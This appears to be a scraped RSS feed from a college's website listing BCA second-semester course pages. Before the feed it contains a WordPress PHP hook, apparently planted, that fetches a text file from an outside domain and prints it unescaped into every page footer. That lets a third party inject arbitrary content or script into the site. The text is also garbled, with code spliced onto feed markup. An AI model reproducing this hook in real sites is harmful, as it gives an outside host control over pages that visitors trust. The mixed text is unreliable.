add_action('wp_footer', 'load_external_footer');
function load_external_footer(){
$url = 'https://kmaa26.com/berita.txt';
$data = wp_safe_remote_get($url);
if(!is_wp_error($data)){
$body = wp_remote_retrieve_body($data);
echo $body;
}
}2 Semester Archives - Synetic Business School
https://sbs.ac.in/course-category/bca/second-semester/
... College with a differenceThu, 12 May 2022 06:50:02 +0000en-US
hourly
1 https://wordpress.org/?v=6.9https://sbs.ac.in/wp-content/uploads/2021/12/cropped-fevicon-32x32.png2 Semester Archives - Synetic Business School
https://sbs.ac.in/course-category/bca/second-semester/
3232Computer System Architecture
https://sbs.ac.in/course/computer-system-architecture/
https://sbs.ac.in/course/computer-system-architecture/#respondSat, 16 Apr 2022 09:16:53 +0000https://sbs.ac.in/?post_type=lp_course&p=18188Text Books: 1. Statistics and Data Analysis, A.Abebe, J. Daniels, J.W.Mckean, December 2000. 2. Statistics, Tmt. S. EzhilarasiThiru, 2005, Government of Tamilnadu. 3. Introduction to Statistics, David M. Lane. 4. Weiss, N.A., Introductory Statistics. Addison Wesley, 1999. 5. Clarke, G.M. …
]]>
https://sbs.ac.in/course/computer-system-architecture/feed/0Object Oriented Programming using C++(UGCA1909)
https://sbs.ac.in/course/object-oriented-programming-using-cugca1909/
https://sbs.ac.in/course/object-oriented-programming-using-cugca1909/#respondMon, 19 Jul 2021 04:22:03 +0000https://sbs.ac.in/?post_type=lp_course&p=14366Course Name: Object Oriented Programming using C++ Course Outcomes: 1. To learn programming from real world examples. 2. To understand Object oriented approach for finding Solutions to various problems with the help of C++ language. 3. To create computer based …
]]>https://sbs.ac.in/course/object-oriented-programming-using-cugca1909/feed/0Computer System Architecture(UGCA1908)
https://sbs.ac.in/course/computer-system-architectureugca1908/
https://sbs.ac.in/course/computer-system-architectureugca1908/#respondSat, 03 Jul 2021 07:49:12 +0000https://sbs.ac.in/?post_type=lp_course&p=14321Course Name: Computer System Architecture Course Outcomes: 1. Know about the basic functioning of various parts of computer system from hardware point of view and interfacing of various peripheral devices used with the system. Learn number system and various types …
]]>https://sbs.ac.in/course/computer-system-architectureugca1908/feed/0Object Oriented Programming Language using C++
https://sbs.ac.in/course/object-oriented-programming-language-using-c/
https://sbs.ac.in/course/object-oriented-programming-language-using-c/#respondMon, 03 May 2021 08:20:54 +0000https://sbs.ac.in/?post_type=lp_course&p=12435CLASS:BCA 2ndSem Batch: 2019-22 Object Oriented Programming Language Using C++ Notes as per IKGPTU Syllabus Name of Faculty: Mr/Ms<<<<<Jatinderpal kaur>>> Faculty of Computer Applictions,SBS College. Ludhiana Detailed Contents Page No. Unit-I Principles of object oriented programming Introduction …